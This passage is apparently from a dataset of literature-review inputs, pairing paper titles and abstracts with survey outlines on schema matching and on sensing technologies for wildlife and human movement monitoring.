present a new framework that uses data examples as the basis for understanding and refining declarative schema mappings. We identify a small set of intuitive operators for manipulating examples. These operators permit a user to follow and refine an example by walking through a data source. We show that our operators are powerful enough both to identify a large class of schema mappings and to distinguish effectively between alternative schema mappings. These operators permit a user to quickly and intuitively build and refine complex data transformation queries that map one data source into another. --- paper_title: Experience with a Combined Approach to Attribute-Matching Across Heterogeneous Databases paper_content: Determining attribute correspondences is a difficult, time-consuming, knowledge-intensive part of database integration. We report on experiences with tools that identified candidate correspondences, as a step in a large scale effort to improve communication among Air Force systems. First, we describe a new method that was both simple and surprisingly successful: Data dictionary and catalog information were dumped to unformatted text; then off-the-shelf information retrieval software estimated string similarity, generated candidate matches, and provided the interface. The second method used a different set of clues, such as statistics on database populations, to compute separate similarity metrics (using neural network techniques). We report on substantial use of the first tool, and then report some limited initial experiments that examine the two techniques’ accuracy, consistency and complementarity. ---
Title: A Survey of Approaches to Automatic Schema Matching Section 1: Introduction Description 1: Provide an overview and motivation for the problem of schema matching, highlighting the need for automated solutions in various application domains. Section 2: Application domains Description 2: Summarize the use of schema matching across different database application domains to emphasize its importance. Section 3: The match operator Description 3: Define the match operator, including its input, output, and how it functions to match schema elements. Section 4: Architecture for generic match Description 4: Describe the high-level architecture for implementing a generic and customizable match operator, detailing the interaction between different components. Section 5: Classification of schema matching approaches Description 5: Provide a taxonomy for the different approaches to schema matching, categorizing them based on various criteria such as schema-level vs. instance-level, element-level vs. structure-level, and linguistic vs. constraint-based approaches. Section 6: Schema-level matchers Description 6: Discuss schema-level matching techniques, including element-level and structure-level matching, linguistic approaches, and constraint-based matchers. Section 7: Instance-level approaches Description 7: Explore instance-level matching techniques that rely on the actual data instances to improve the accuracy of schema matching. Section 8: Combining different matchers Description 8: Explain the methodologies for combining different matchers to enhance the accuracy and effectiveness of schema matching, including hybrid matchers and composite matchers. Section 9: Prototype schema matchers Description 9: Review various prototype implementations of schema matchers, comparing their approaches, strengths, and weaknesses. Section 10: Conclusion Description 10: Summarize the key points covered in the survey and discuss potential future research directions in the field of schema matching.
Sensing Solutions for Collecting Spatio-Temporal Data for Wildlife Monitoring Applications: A Review
18
--- paper_title: Long-term, year-round monitoring of wildlife crossing structures and the importance of temporal and spatial variability in performance studies paper_content: Maintaining landscape connectivity where habitat linkages or animal migrations intersect roads requires some form of mitigation to increase permeability. Wildlife crossing structures are now being designed and incorporated into numerous road construction projects to mitigate the effects of habitat fragmentation. For them to be functional they must promote immigration and population viability. There has been a limited amount of research and information on what constitutes effective structural designs. One reason for the lack of information is because few mitigation programs implemented monitoring programs with sufficient experimental design into pre- and post-construction. Thus, results obtained from most studies remain observational at best. Furthermore, studies that did collect data in more robust manners generally failed to address the need for wildlife habituation to such large-scale landscape change. Such habituation periods can take several years depending on the species as they experience, learn and adjust their own behaviours to the wildlife structures. Also, the brief monitoring periods frequently incorporated are simply insufficient to draw on reliable conclusions. Earlier studies focused primarily on single-species crossing structure relationships, paying limited attention to ecosystem-level phenomena. The results of single species monitoring programs may fail to recognize the barrier effects imposed on other non-target species. Thus, systems can be severely compromised if land managers and transportation planners rely on simple extrapolation species. In a previous analysis of wildlife underpasses in Banff National Park (BNP), Canada, we found human influence consistently ranked high as a significant factor affecting species passage. Our results suggest that the physical dimensions of the underpasses had little effect on passage because animals may have adapted to the 12-year old underpasses. As a sequel to the above study, we examined a completely new set of recently constructed underpasses and overpasses which animals had little time to become familiar with. We investigated the importance of temporal and spatial variability using data obtained from systematic, year-round monitoring of 13 newly-constructed wildlife crossing structures 34 months post-construction. Our results suggest that structural attributes best correlated to performance indices for both large predator and prey species, while landscape and human-related factors were of secondary importance. These findings underscore the importance of integrating temporal and spatial variability as a priori when addressing wildlife crossing structure efficacy, and the fact that species respond differently to crossing structure features. Thus mitigation planning in a multiple-species ecosystem is likely to be a challenging process. The results from this work suggest that mitigation strategies need to be proactive at the site and landscape level to ensure that crossing structures remain functional over time, including human use management. Continuous long-term monitoring of crossing structures will be key to ascertaining the strengths and weaknesses of design characteristics for a multi-species assemblage --- paper_title: Spatio-temporal Relationships Among Adult Raccoons (Procyon lotor) in Central Mississippi paper_content: Abstract We monitored 131 (99 male, 32 female) radiocollared raccoons (Procyon lotor) from January 1991 to December 1997 on the Tallahala Wildlife Management Area, Mississippi. We examined inter- and intrasexual spatial relationships and temporal interactions among adults. Adult males frequently maintained overlapping home ranges and core use areas and some males maintained spatial groups that overlapped minimally with adjacent groups or solitary males, suggesting territoriality among groups. Males arranged in spatial groups were often significantly positively associated with each other; however, we observed instances of males who remained solitary and maintained exclusive home ranges and core areas. Adult females maintained exclusive home ranges and core areas during winter, but several females shared home ranges during other seasons. However, these females did not forage or den together and were significantly negatively associated with each other within shared areas, indicating that movements by these i... --- paper_title: An emerging movement ecology paradigm paper_content: Movement of individual organisms, one of the most fundamental features of life on Earth, is a crucial component of almost any ecological and evolutionary process, including major problems associated with habitat fragmentation, climate change, biological invasions, and the spread of pests and diseases. The rich variety of movement modes seen among microorganisms, plants, and animals has fascinated mankind since time immemorial. The prophet Jeremiah (7th century B.C.), for instance, described the temporal consistency in migratory patterns of birds, and Aristotle (4th century B.C.) searched for common features unifying animal movements (see ref. 1). --- paper_title: The interpretation of habitat preference metrics under use–availability designs paper_content: Models of habitat preference are widely used to quantify animal-habitat relationships, to describe and predict differential space use by animals, and to identify habitat that is important to an animal (i.e. that is assumed to influence fitness). Quantifying habitat preference involves the statistical comparison of samples of habitat use and availability. Preference is therefore contingent upon both of these samples. The inferences that can be made from use versus availability designs are influenced by subjectivity in defining what is available to the animal, the problem of quantifying the accessibility of available resources and the framework in which preference is modelled. Here, we describe these issues, document the conditional nature of preference and establish the limits of inferences that can be drawn from these analyses. We argue that preference is not interpretable as reflecting the intrinsic behavioural motivations of the animal, that estimates of preference are not directly comparable among different samples of availability and that preference is not necessarily correlated with the value of habitat to the animal. We also suggest that preference is context-dependent and that functional responses in preference resulting from changing availability are expected. We conclude by describing advances in analytical methods that begin to resolve these issues. --- paper_title: Foraging theory upscaled: the behavioural ecology of herbivore movement paper_content: We outline how principles of optimal foraging developed for diet and food patch selection might be applied to movement behaviour expressed over larger spatial and temporal scales. Our focus is on large mammalian herbivores, capable of carrying global positioning system (GPS) collars operating through the seasonal cycle and dependent on vegetation resources that are fixed in space but seasonally variable in availability and nutritional value. The concept of intermittent movement leads to the recognition of distinct movement modes over a hierarchy of spatio-temporal scales. Over larger scales, periods with relatively low displacement may indicate settlement within foraging areas, habitat units or seasonal ranges. Directed movements connect these patches or places used for other activities. Selection is expressed by switches in movement mode and the intensity of utilization by the settlement period relative to the area covered. The type of benefit obtained during settlement periods may be inferred from movement patterns, local environmental features, or the diel activity schedule. Rates of movement indicate changing costs in time and energy over the seasonal cycle, between years and among regions. GPS telemetry potentially enables large-scale movement responses to changing environmental conditions to be linked to population performance. --- paper_title: Behavioral adjustments of African herbivores to predation risk by lions: spatiotemporal variations influence habitat use. paper_content: Predators may influence their prey populations not only through direct lethal effects, but also through indirect behavioral changes. Here, we combined spatiotemporal fine-scale data from GPS radio collars on lions with habitat use information on 11 African herbivores in Hwange National Park (Zimbabwe) to test whether the risk of predation by lions influenced the distribution of herbivores in the landscape. Effects of long-term risk of predation (likelihood of lion presence calculated over four months) and short-term risk of predation (actual presence of lions in the vicinity in the preceding 24 hours) were contrasted. The long-term risk of predation by lions appeared to influence the distributions of all browsers across the landscape, but not of grazers. This result strongly suggests that browsers and grazers, which face different ecological constraints, are influenced at different spatial and temporal scales in the variation of the risk of predation by lions. The results also show that all herbivores tend to use more open habitats preferentially when lions are in their vicinity, probably an effective anti-predator behavior against such an ambush predator. Behaviorally induced effects of lions may therefore contribute significantly to structuring African herbivore communities, and hence possibly their effects on savanna ecosystems. --- paper_title: Stochastic modelling of animal movement paper_content: Modern animal movement modelling derives from two traditions. Lagrangian models, based on random walk behaviour, are useful for multi-step trajectories of single animals. Continuous Eulerian models describe expected behaviour, averaged over stochastic realizations, and are usefully applied to ensembles of individuals. We illustrate three modern research arenas. (i) Models of home-range formation describe the process of an animal ‘settling down’, accomplished by including one or more focal points that attract the animal's movements. (ii) Memory-based models are used to predict how accumulated experience translates into biased movement choices, employing reinforced random walk behaviour, with previous visitation increasing or decreasing the probability of repetition. (iii) Levy movement involves a step-length distribution that is over-dispersed, relative to standard probability distributions, and adaptive in exploring new environments or searching for rare targets. Each of these modelling arenas implies more detail in the movement pattern than general models of movement can accommodate, but realistic empiric evaluation of their predictions requires dense locational data, both in time and space, only available with modern GPS telemetry. --- paper_title: A line in the sand: A wireless sensor network for target detection, classification, and tracking paper_content: Intrusion detection is a surveillance problem of practical import that is well suited to wireless sensor networks. In this paper, we study the application of sensor networks to the intrusion detection problem and the related problems of classifying and tracking targets. Our approach is based on a dense, distributed, wireless network of multi-modal resource-poor sensors combined into loosely coherent sensor arrays that perform in situ detection, estimation, compression, and exfiltration. We ground our study in the context of a security scenario called "A Line in the Sand" and accordingly define the target, system, environment, and fault models. Based on the performance requirements of the scenario and the sensing, communication, energy, and computation ability of the sensor network, we explore the design space of sensors, signal processing algorithms, communications, networking, and middleware services. We introduce the influence field, which can be estimated from a network of binary sensors, as the basis for a novel classifier. A contribution of our work is that we do not assume a reliable network; on the contrary, we quantitatively analyze the effects of network unreliability on application performance. Our work includes multiple experimental deployments of over 90 sensor nodes at MacDill Air Force Base in Tampa, FL, as well as other field experiments of comparable scale. Based on these experiences, we identify a set of key lessons and articulate a few of the challenges facing extreme scaling to tens or hundreds of thousands of sensor nodes. --- paper_title: Target classification by echo locating animals paper_content: In this paper, the principal mechanisms by which bats are assumed to classify targets are reviewed. Particular attention is paid to the ways in which bats might extract information from echoes. Classification mechanisms differ fundamentally according to signal design. It is shown how bats design their emitted waveforms according to whether they need to classify on the basis of micro-Doppler or range profile information. Throughout, analogies are made with radar (and sonar) systems, drawing attention to some ways in which engineers might learn from the classification mechanisms proposed for echo locating animals. --- paper_title: The bird GPS - long-range navigation in migrants paper_content: SUMMARY Nowadays few people consider finding their way in unfamiliar areas a ::: problem as a GPS (Global Positioning System) combined with some simple map ::: software can easily tell you how to get from A to B. Although this opportunity ::: has only become available during the last decade, recent experiments show that ::: long-distance migrating animals had already solved this problem. Even after ::: displacement over thousands of kilometres to previously unknown areas, ::: experienced but not first time migrant birds quickly adjust their course ::: toward their destination, proving the existence of an experience-based GPS in ::: these birds. Determining latitude is a relatively simple task, even for ::: humans, whereas longitude poses much larger problems. Birds and other animals ::: however have found a way to achieve this, although we do not yet know how. ::: Possible ways of determining longitude includes using celestial cues in ::: combination with an internal clock, geomagnetic cues such as magnetic ::: intensity or perhaps even olfactory cues. Presently, there is not enough ::: evidence to rule out any of these, and years of studying birds in a laboratory ::: setting have yielded partly contradictory results. We suggest that a concerted ::: effort, where the study of animals in a natural setting goes hand-in-hand with ::: lab-based study, may be necessary to fully understand the mechanism underlying ::: the long-distance navigation system of birds. As such, researchers must remain ::: receptive to alternative interpretations and bear in mind that animal ::: navigation may not necessarily be similar to the human system, and that we ::: know from many years of investigation of long-distance navigation in birds ::: that at least some birds do have a GPS – but we are uncertain how it ::: works. --- paper_title: Self-contained Position Tracking of Human Movement Using Small Inertial/Magnetic Sensor Modules paper_content: Numerous applications require a self-contained personal navigation system that works in indoor and outdoor environments, does not require any infrastructure support, and is not susceptible to jamming. Posture tracking with an array of inertial/magnetic sensors attached to individual human limb segments has been successfully demonstrated. The "sourceless" nature of this technique makes possible full body posture tracking in an area of unlimited size with no supporting infrastructure. Such sensor modules contain three orthogonally mounted angular rate sensors, three orthogonal linear accelerometers and three orthogonal magnetometers. This paper describes a method for using accelerometer data combined with orientation estimates from the same modules to calculate position during walking and running. The periodic nature of these motions includes short periods of zero foot velocity when the foot is in contact with the ground. This pattern allows for precise drift error correction. Relative position is calculated through double integration of drift corrected accelerometer data. Preliminary experimental results for various types of motion including walking, side stepping, and running document accuracy of distance and position estimates. --- paper_title: A New Application for Transponders in Population Ecology of the Common Tern paper_content: We injected transponders subcutaneously to mark single Common Tern (Sterna hirundo) adults and all chicks of a colony at Wilhelmshaven with the aim of establishing a completely marked colony. We present details on the equipment and methods and report preliminary results. Microtagged terns can be identified for life, not only at their nest when breeding, but also at resting places by fixed antennas at distances of < 11 cm. Thus, nonbreeders can be identified as well. We also weighed terns remotely to obtain information on their body condition. Body mass data as well as identification codes were electronically stored. Preliminary data indicated that adult survival was ≥ 87% and subadult survival until age two was ≥ 20%. --- paper_title: Seismic footstep signal characterization paper_content: Seismic footstep detection based systems for homeland security applications are an important additional layer to perimeter protection and other security systems. This article reports seismic footstep signal characterization for different signal to noise ratios. Various footstep signal spectra are analyzed for different distances between a walking person and a seismic sensor. We also investigated kurtosis of the real footstep signals under various ::: environmental and modeled noises. We also report on the results of seismic signal summation from separate geophones. A seismic signal sum spectrum obtained was broader than that obtained from a single sensor. The peak of the seismic signal sum was broader than that from the footstep signal of the single sensor. The signal and noise ::: spectra have a greater overlap for a seismic signal sum than that from a single sensor. Generally, it is more difficult to filter out the noise from the sum of the seismic signals. We show that the use of the traditional approach of spectrum technology and/or the statistical characteristics of signal to noise of reliable footstep detection systems is not practical. --- paper_title: Tracking Long-Distance Songbird Migration by Using Geolocators paper_content: We mapped migration routes of migratory songbirds to the Neotropics by using light-level geolocators mounted on breeding purple martins (Progne subis) and wood thrushes (Hylocichla mustelina). Wood thrushes from the same breeding population occupied winter territories within a narrow east-west band in Central America, suggesting high connectivity of breeding and wintering populations. Pace of spring migration was rapid (233 to 577 kilometers/day) except for one individual (159 kilometers/day) who took an overland route instead of crossing the Gulf of Mexico. Identifying songbird wintering areas and migration routes is critical for predicting demographic consequences of habitat loss and climate change in tropical regions. --- paper_title: RFID: a technical overview and its application to the enterprise paper_content: Radio frequency identification (RFID) offers tantalizing benefits for supply chain management, inventory control, and many other applications. Only recently, however, has the convergence of lower cost and increased capabilities made businesses take a hard look at what RFID can do for them. This article offers an RFID tutorial that answers the following questions: i) what is RFID, and how does it work? ii) What are some applications of RFID? iii) What are some challenges and problems in RFID technology and implementation? iv) How have some organizations implemented RFID?. --- paper_title: Wireless sensor devices for animal tracking and control paper_content: This paper describes some new wireless sensor hardware ::: developed for pastoral and environmental applications. ::: From our early experiments with Mote hardware we ::: were inspired to develop our devices with improved radio ::: range, solar power capability, mechanical and electrical robustness, ::: and with unique combinations of sensors. Here we ::: describe the design and evolution of a small family of devices: ::: radio/processor board, a soil moisture sensor interface, ::: and a single board multi-sensor unit for animal tracking ::: experiments. --- paper_title: The design and implementation of a self-calibrating distributed acoustic sensing platform paper_content: We present the design, implementation, and evaluation of the Acoustic Embedded Networked Sensing Box (ENSBox), a platform for prototyping rapid-deployable distributed acoustic sensing systems, particularly distributed source localization. Each ENSBox integrates an ARM processor running Linux and supports key facilities required for source localization: a sensor array, wireless network services, time synchronization, and precise self-calibration of array position and orientation. The ENSBox’s integrated, high precision self-calibration facility sets it apart from other platforms. This self-calibration is precise enough to support acoustic source localization applications in complex, realistic environments: e.g., 5 cm average 2D position error and 1.5 degree average orientation error over a partially obstructed 80x50 m outdoor area. Further, our integration of array orientation into the position estimation algorithm is a novel extension of traditional multilateration techniques. We present the result of several different test deployments, measuring the performance of the system in urban settings, as well as forested, hilly environments with obstructing foliage and 20–30 m distances between neighboring nodes. --- paper_title: Evolution and sustainability of a wildlife monitoring sensor network paper_content: As sensor network technologies become more mature, they are increasingly being applied to a wide variety of applications, ranging from agricultural sensing to cattle, oceanic and volcanic monitoring. Significant efforts have been made in deploying and testing sensor networks resulting in unprecedented sensing capabilities. A key challenge has become how to make these emerging wireless sensor networks more sustainable and easier to maintain over increasingly prolonged deployments. In this paper, we report the findings from a one year deployment of an automated wildlife monitoring system for analyzing the social co-location patterns of European badgers (Meles meles) residing in a dense woodland environment. We describe the stages of its evolution cycle, from implementation, deployment and testing, to various iterations of software optimization, followed by hardware enhancements, which in turn triggered the need for further software optimization. We report preliminary descriptive analyses of a subset of the data collected, demonstrating the significant potential our system has to generate new insights into badger behavior. The main lessons learned were: the need to factor in the maintenance costs while designing the system; to look carefully at software and hardware interactions; the importance of a rapid initial prototype deployment (this was key to our success); and the need for continuous interaction with domain scientists which allows for unexpected optimizations. --- paper_title: Geophone Detection of Subterranean Termite and Ant Activity paper_content: A geophone system was used to monitor activity of subterranean termites and ants in a desert environment with low vibration noise. Examples of geophone signals were recorded from a colony of Rhytidoponera taurus (Forel), a colony of Camponotus denticulatus Kirby, and a termite colony (undetermined Drepanotermes sp.) under attack by ants from a nearby C. denticulatus colony. The geophone recordings were compared with signals recorded from accelerometers in a citrus grove containing Solenopsis invicta Buren workers. Because of their small size, all of these insects produce relatively weak sounds. Several different types of insect-generated sounds were identified in the geophone recordings, including high-frequency ticks produced by R. taurus and C. denticulatus, and patterned bursts of head bangs produced by Drepanotermes. The S. invicta produced bursts of ticks with three different stridulation frequencies, possibly produced by three different-sized workers. Overall, both systems performed well in enabling identification of high-frequency or patterned pulses. The geophone was more sensitive than the accelerometer to low-frequency signals, but low-frequency insect sound pulses are more difficult to distinguish from background noises than high-frequency pulses. The low cost of multiple-geophone systems may facilitate development of future applications for wide-area subterranean insect monitoring in quiet environments. --- paper_title: Lightweight Signal Processing Algorithms for Human Activity Monitoring using Dual PIR-sensor Nodes paper_content: A dual Pyroelectric InfraRed (PIR) sensor node is ::: used for human activity monitoring by using simple data processing ::: techniques. We first point out the limitations of existing ::: approaches, employing PIR sensors, for activity monitoring. We ::: study the spectral characteristics of the sensor data for the cases ::: of varying distance between the sensor and moving object as well ::: as the speed of the object under observation. The sampled data ::: from two PIR sensors, is first processed individually to determine ::: the activity window size, which is then fed to a simple algorithm ::: to determine direction of motion.We also claim that human count ::: can be obtained for special scenarios. Preliminary results of our ::: experimentation show the effectiveness of the simple algorithm ::: proposed and give us an avenue for estimating more involved ::: parameters used for speed and localization. --- paper_title: Finding frequently visited paths: Dealing with the uncertainty of spatio-temporal mobility data paper_content: With the ever-increasing advancements in sensor technology and localization systems, large amounts of spatio-temporal data can be collected from moving objects equipped with wireless sensor nodes. Analysis of such data provides the opportunity of extracting useful information about movement behaviour and interaction between moving objects. Inherent characteristics of wireless sensor nodes cause the data collected by them to have low or irregular frequency and often be erroneous. Existence of different levels of uncertainty in these data makes the procedure of finding movement patterns difficult and ambiguous. In this paper, we propose a hierarchical approach to find the frequently visited paths using location data of people carrying a custom designed mobile wireless sensor node. We hierarchically cluster trajectories and find their resemblance at the finest level while dealing with the uncertainties. The performance evaluation results show that compared with previous schemes, our method performs better in presence of ambiguity and sources of data uncertainty. --- paper_title: Towards radar-enabled sensor networks paper_content: Ultra wideband radar-enabled wireless sensor networks have the potential to address key detection and classification requirements common to many surveillance and tracking applications. However, traditional radar signal processing techniques are mismatched with the limited computational and storage resources available on typical sensor nodes. The mismatch is exacerbated in noisy, cluttered environments or when the signals have corrupted spectra. To explore the compatibility of ultra wideband radar and mote-class sensor nodes, we designed and built a new platform called the radar mote. An early prototype of this platform was used to detect, classify, and track people and vehicles moving through an outdoor sensor network deployment. This paper describes the sensor's theory of operation, discusses the design and implementation of the radar mote, and presents sample signal waveforms of people, vehicles, noise, and clutter. We demonstrate that radar sensors can be successfully integrated with mote-class devices and imbue them with an extraordinarily useful sensing modality. --- paper_title: Acoustic monitoring in terrestrial environments using microphone arrays: applications, technological considerations and prospectus paper_content: Summary 1. Animals produce sounds for diverse biological functions such as defending territories, attracting mates, deterring predators, navigation, finding food and maintaining contact with members of their social group. Biologists can take advantage of these acoustic behaviours to gain valuable insights into the spatial and temporal scales over which individuals and populations interact. Advances in bioacoustic technology, including the development of autonomous cabled and wireless recording arrays, permit data collection at multiple locations over time. These systems are transforming the way we study individuals and populations of animals and are leading to significant advances in our understandings of the complex interactions between animals and their habitats. 2. Here, we review questions that can be addressed using bioacoustic approaches, by providing a primer on technologies and approaches used to study animals at multiple organizational levels by ecologists, behaviourists and conservation biologists. 3. Spatially dispersed groups of microphones (arrays) enable users to study signal directionality on a small scale or to locate animals and track their movements on a larger scale. 4. Advances in algorithm development can allow users to discriminate among species, sexes, age groups and individuals. 5. With such technology, users can remotely and non-invasively survey populations, describe the soundscape, quantify anthropogenic noise, study species interactions, gain new insights into the social dynamics of sound-producing animals and track the effects of factors such as climate change and habitat fragmentation on phenology and biodiversity. 6. There remain many challenges in the use of acoustic monitoring, including the difficulties in performing signal recognition across taxa. The bioacoustics community should focus on developing a --- paper_title: A PIT tag based analysis of annual movement patterns of adult fire salamanders (Salamandra salamandra) in a Middle European habitat paper_content: We studied patterns of annual movement of individual adult fire salamanders (Salamandra salamandra) during the years 2001 and 2002 in Western Germany in a typical middle European habitat for this species. We tested whether salamanders inhabit small home ranges and move little during the activity period as predicted for a species that shows strong site fidelity to a limited area. Initially, 98 individuals were collected in their natural habitat and marked with passive integrated transponder (PIT) tags. Of those individuals 88 were released at the collection site for recapture during the activity periods of the years 2001 and 2002. Ten marked individuals were kept in captivity to test for the tolerance of PIT tags. We did not find any negative impact of PIT tags on marked individuals of S. salamandra, neither under captive nor natural conditions. Forty-seven of the marked individuals (corresponding to 53% of the 88 released ones) were recaptured at least once and 28 individuals (corresponding to 32%) were recaptured multiple times. The return rate of males (78%) was higher than for females (43%). Mean home range size (and standard deviation) was estimated to 494 ± 282 m 2 for 4 individuals as the minimum convex polygon based on 5 to 6 recapture events for each individual per year and to 1295 ± 853 m 2 for 3 individuals with 8 records over two years. Minimum distances moved inferred from individual recaptures increased during the activity period of both years with time, indicating that individuals have more of a tendency to disperse than to stay within a limited area. Our data suggest therefore that S. salamandra adults display site fidelity, but use a much larger area than hitherto documented for this and other terrestrial salamander species. --- paper_title: Wireless sensor networks for habitat monitoring paper_content: We provide an in-depth study of applying wireless sensor networks to real-world habitat monitoring. A set of system design requirements are developed that cover the hardware design of the nodes, the design of the sensor network, and the capabilities for remote data access and management. A system architecture is proposed to address these requirements for habitat monitoring in general, and an instance of the architecture for monitoring seabird nesting environment and behavior is presented. The currently deployed network consists of 32 nodes on a small island off the coast of Maine streaming useful live data onto the web. The application-driven design exercise serves to identify important areas of further work in data sampling, communications, network retasking, and health monitoring. --- paper_title: ZigBee-based wireless sensor networks for classifying the behaviour of a herd of animals using classification trees paper_content: An in-depth study of wireless sensor networks applied to the monitoring of animal behaviour in the field is described. Herd motion data, such as the pitch angle of the neck and movement velocity, were monitored by an MTS310 sensor board equipped with a 2-axis accelerometer and received signal strength indicator functionality in a single-hop wireless sensor network. Pitch angle measurements and velocity estimates were transmitted through a wireless sensor network based on the ZigBee communication protocol. After data filtering, the pitch angle measurements together with velocity estimates were used to classify the animal behaviour into two classes; as activity and inactivity. Considering all the advantages and drawbacks of classification trees compared to neural network and fuzzy logic classifiers a general classification tree was preferred. The classification tree was constructed based on the measurements of the pitch angle of the neck and movement velocity of some animals in the herd and was used to predict the behaviour of other animals in the herd. The results showed that there was a large improvement in the classification accuracy if both the pitch angle of the neck and the velocity were employed as predictors when compared to just pitch angle or just velocity employed as a single predictor. The classification results showed the possibility of determining a general decision rule which can classify the behaviour of each individual in a herd of animals. The results were confirmed by manual registration and by GPS measurements. --- paper_title: Odor Recognition and Localization Using Sensor Networks paper_content: Odor usually quantified by five parameters which are 1) intensity, 2) degree of offensiveness, 3) character, 4) frequency, and 5) duration. It has different forms including Gas, Chemical, Radiation, Organic Compounds, and Water odors including different water contaminations. For such odors, there are many of the traditional methods that have been used for a number of years. However, these methods suffer from different problems including the detection cost, the long time taken for analysis and detection, and exposing human to danger. On the other hand, the advances in sensing technology lead to the usage of sensor networks in many applications. For instance, sensors have been used to monitor animals in habitat areas and monitor patients’ health. In addition, sensor networks have been used to monitor critical infrastructures such as gas, transportation, energy, and water pipelines as well as important buildings. Sensors are tiny devices that can be included in small areas. At the same time, they are capable of capturing different phenomena from the environment, analyze the collected data, and take decisions. In addition, sensors are able to form unattended wireless ad hoc network that can survive for long time. Such features enable wireless sensor networks (WSN) to play an essential role in odor detection. In fact, odor detection became one of the important applications due to the terrorist attack that started by the one occurred at Tokyo Subway in 1995. Since this time, odor detection and localization is considered as one of the important applications. Researchers believe that sensors and sensor networks will play an important role in odor detection and localization. In this chapter, we generalize the term odor to include the radiation detection and localization since the radiation in most of the recent work is considered as an odor. --- paper_title: A prototype sensor node for footstep detection paper_content: Persons moving over ground can be detected from vibrations induced to soil in the form of seismic waves which are measured by geophones or expensive MEMS accelerometers. We are proposing a sensor node that uses a low-cost bending mode piezoelectric accelerometer, operating near its resonant frequency, specially designed for footstep detection. --- paper_title: A Survey on Wireless Multimedia Sensor Networks paper_content: The availability of low-cost hardware such as CMOS cameras and microphones has fostered the development of Wireless Multimedia Sensor Networks (WMSNs), i.e., networks of wirelessly interconnected devices that are able to ubiquitously retrieve multimedia content such as video and audio streams, still images, and scalar sensor data from the environment. In this paper, the state of the art in algorithms, protocols, and hardware for wireless multimedia sensor networks is surveyed, and open research issues are discussed in detail. Architectures for WMSNs are explored, along with their advantages and drawbacks. Currently off-the-shelf hardware as well as available research prototypes for WMSNs are listed and classified. Existing solutions and open research issues at the application, transport, network, link, and physical layers of the communication protocol stack are investigated, along with possible cross-layer synergies and optimizations. --- paper_title: SensEye: a multi-tier camera sensor network paper_content: This paper argues that a camera sensor network containing heterogeneous elements provides numerous benefits over traditional homogeneous sensor networks. We present the design and implementation of senseye---a multi-tier network of heterogeneous wireless nodes and cameras. To demonstrate its benefits, we implement a surveillance application using senseye comprising three tasks: object detection, recognition and tracking. We propose novel mechanisms for low-power low-latency detection, low-latency wakeups, efficient recognition and tracking. Our techniques show that a multi-tier sensor network can reconcile the traditionally conflicting systems goals of latency and energy-efficiency. An experimental evaluation of our prototype shows that, when compared to a single-tier prototype, our multi-tier senseye can achieve an order of magnitude reduction in energy usage while providing comparable surveillance accuracy. --- paper_title: Acoustic and seismic modalities for unattended ground sensors paper_content: In this paper, we have presented the relative advantages and complementary aspects of acoustic and seismic ground sensors. A detailed description of both acoustic and seismic ground sensing methods has been provided. Acoustic and seismic phenomenology including source mechanisms, propagation paths, attenuation, and sensing have been discussed in detail. The effects of seismo-acoustic and acousto-seismic interactions as well as recommendations for minimizing seismic/acoustic cross talk have been highlighted. We have shown representative acoustic and seismic ground sensor data to illustrate the advantages and complementary aspects of the two modalities. The data illustrate that seismic transducers often respond to acoustic excitation through acousto-seismic coupling. Based on these results, we discussed the implications of this phenomenology on the detection, identification, and localization objectives of unattended ground sensors. We have concluded with a methodology for selecting the preferred modality (acoustic and/or seismic) for a particular application. --- paper_title: RFID enhances visitors' museum experience at the Exploratorium paper_content: Interactive RFID-enhanced museum exhibits let visitors continue their scientific exploration beyond the museum's walls. But museums must still help them understand the technology and address their data privacy concerns. --- paper_title: Human activity analysis: A review paper_content: Human activity recognition is an important area of computer vision research. Its applications include surveillance systems, patient monitoring systems, and a variety of systems that involve interactions between persons and electronic devices such as human-computer interfaces. Most of these applications require an automated recognition of high-level activities, composed of multiple simple (or atomic) actions of persons. This article provides a detailed overview of various state-of-the-art research papers on human activity recognition. We discuss both the methodologies developed for simple human actions and those for high-level activities. An approach-based taxonomy is chosen that compares the advantages and limitations of each approach. Recognition methodologies for an analysis of the simple actions of a single person are first presented in the article. Space-time volume approaches and sequential approaches that represent and recognize activities directly from input images are discussed. Next, hierarchical recognition methodologies for high-level activities are presented and compared. Statistical approaches, syntactic approaches, and description-based approaches for hierarchical recognition are discussed in the article. In addition, we further discuss the papers on the recognition of human-object interactions and group activities. Public datasets designed for the evaluation of the recognition methodologies are illustrated in our article as well, comparing the methodologies' performances. This review will provide the impetus for future research in more productive areas. --- paper_title: Analysing Animal Behaviour in Wildlife Videos Using Face Detection and Tracking paper_content: An algorithm that categorises animal locomotive behaviour by combining detection and tracking of animal faces in wildlife videos is presented. As an example, the algorithm is applied to lion faces. The detection algorithm is based on a human face detection method, utilising Haar-like features and AdaBoost classifiers. The face tracking is implemented by applying a specific interest model that combines low-level feature tracking with the detection algorithm. By combining the two methods in a specific tracking model, reliable and temporally coherent detection/tracking of animal faces is achieved. The information generated by the tracker is used to automatically annotate the animal's locomotive behaviour. The annotation classes of locomotive processes for a given animal species are predefined by a large semantic taxonomy on wildlife domain. The experimental results are presented. --- paper_title: Recognising human and animal movement by symmetry paper_content: We show how the symmetry of motion can be extracted by using the generalised symmetry operator for analysing motion and for gait recognition. This operator, rather than relying on the borders of a shape or on general appearance, locates features by their symmetrical properties. This approach is reinforced by the view from psychology that human gait is a symmetrical pattern of motion, and by other works. We applied our new method to compare animal gait, and for recognition by gait. Results show that the symmetry properties of gait appear to be unique and can indeed be used for analysis and for recognition. We have so far achieved promising recognition rates of over 95%. Performance analysis also suggests that symmetry enjoys practical advantages such as relative immunity to noise with capability to handle occlusion and as such might prove suitable for applications like clip-database browsing. --- paper_title: Sensor Network for the Monitoring of Ecosystem: Bird Species Recognition paper_content: In this paper, we investigated the performance of bird species recognition using neural networks with different preprocessing methods and different sets of features. Context neural network architecture was designed to embed the dynamic nature of bird songs into inputs. We devised a noise reduction algorithm and effectively applied it to enhance bird species recognition. The performance of the context neural network architecture was comparatively evaluated with linear/mel frequency cepstral coefficients and promising experimental results were achieved. --- paper_title: Human identification experiments using acoustic micro-Doppler signatures paper_content: Active acoustic scene analysis is a promising approach to distributed persistent surveillance in sensor networks. We report on the design of bandpass sampling technique for an acoustic micro-Doppler sonar to reduce the data rate to as low as 85 kbps. We then explore the use of Gaussian mixture models for human identification. We compare the classification performances using different feature vectors and from different sampling schemes. We show that the use of differential cepstral vectors of context length 2 improves the classification accuracy. We also show that the classification performance of the bandpass sampling system with an 8-bit resolution is still over 90% on a database consisting of 160 gait signatures from 8 individuals. --- paper_title: The Statistical Meaning of Kurtosis and Its New Application to Identification of Persons Based on Seismic Signals paper_content: This 